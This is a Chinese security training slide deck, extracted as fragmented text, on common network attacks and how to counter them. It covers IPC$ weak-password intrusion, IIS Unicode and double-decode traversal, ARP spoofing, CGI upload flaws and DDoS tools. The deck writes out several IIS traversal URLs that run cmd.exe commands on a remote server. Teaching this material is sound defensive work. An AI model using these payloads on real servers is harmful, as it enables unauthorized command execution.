常见的攻击和防范(新)课件.ppt

1、蓝盾安全小组 前言：前言：在网络这个不断更新换代的世界里，网络中的安全漏洞无处不在。即便旧的安全漏洞补上了，新的安全漏洞又将不断涌现。网络攻击正是利用这些存在的漏洞和安全缺陷对系统和资源进行攻击。蓝盾安全小组蓝盾安全小组蓝盾安全小组 一、常见攻击方法一、常见攻击方法 1、弱口令和IPC入侵 IPC是指“Inter Process Communications”,准确的说是ipc$，是默认的在系统启动时的admin共享。（1）操作系统默认用户如：GUEST、IWAM_DAMU12A5UQCWDJL（2）应用软件默认用户如：SQL的SU用户 蓝盾安全小组蓝盾安全小组l 二、UNICODE漏洞 UN

2、ICODE 漏洞是经常被入侵者利用的漏洞之一。在2001年5月1日黑客大战中，黑客们就普遍利用此漏洞对各国网站进行攻击。蓝盾安全小组 黑客可以远程通过IIS执行以下命令，列出指定URL中 C：盘根目录下的所有内容。http:/ 或 http:/ by qting解决办法：解决办法：A、及时的装补丁 B、关闭没用到的端口蓝盾安全小组IIS IIS unicodeunicode 漏洞漏洞:/scripts/.%c0%2f.%c0%2f.%c0%2f.%c0%2f./winnt/system32/cmd.exe?/c+dir /scripts/.%c1%1c.%c1%1c.%c1%1c.%c1%1c

3、./winnt/system32/cmd.exe?/c+dir /scripts/check.bat/.%c0%2f.%c0%2f.%c0%2f/winnt/system32/cmd.exe?/c%20dir%20C:/scripts/check.bat/.%c1%1c.%c1%1c.%c1%1c/winnt/system32/cmd.exe?/c%20dir%20C:IIS CGI文件名二次解码漏洞文件名二次解码漏洞:/_vti_bin/.%35%63.%35%63.%35%63.%35%63.%35%63./winnt/system32/cmd.exe?/c+dir /_vti_bin/.

4、%35c.%35c.%35c.%35c.%35c./winnt/system32/cmd.exe?/c+dir 蓝盾安全小组3 3、ARPARP欺骗欺骗ARP协议是“Address Resolution Protocol”（地址解析协议）的缩写。在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。IP地址地址逻辑地址物理地址蓝盾安全小组蓝盾安全小组Internet192.168.0.3被投入ARP欺骗木马l3、CGI漏洞攻击l如：UPLOADER.EXEl 如果使用WINNT作为WEBSERVE

5、R的操作系统，入侵者能够利用UPLOADER.EXE上传任何文件。l解决方法：l将UPLOADER.EXE从WEB目录移走或删除。蓝盾安全小组l4、拒绝服务攻击l 拒绝服务攻击是一种遍布全球的系统漏洞，黑客们正醉心于对它的研究，而无数的 网络用户将成为这种攻击的受害者。Tribe Flood Network,tfn2k,smurf,targa还有许多的程序都在被不断的开发出来。蓝盾安全小组蓝盾安全小组目标主机国内黑客台湾个人电脑（跳板）-l后门攻击l拒绝服务攻击l分布式拒绝服务攻击l扫描攻击l缓冲区溢出攻击l远程过程调用攻击l网络蠕虫l病毒l基于CGI的Web攻击l基于Frontpage的Web攻击l基于IIS的Web攻击l基于Coldfusion的Web攻击l前导攻击lICMP攻击lSMTP攻击l其它攻击蓝盾安全小组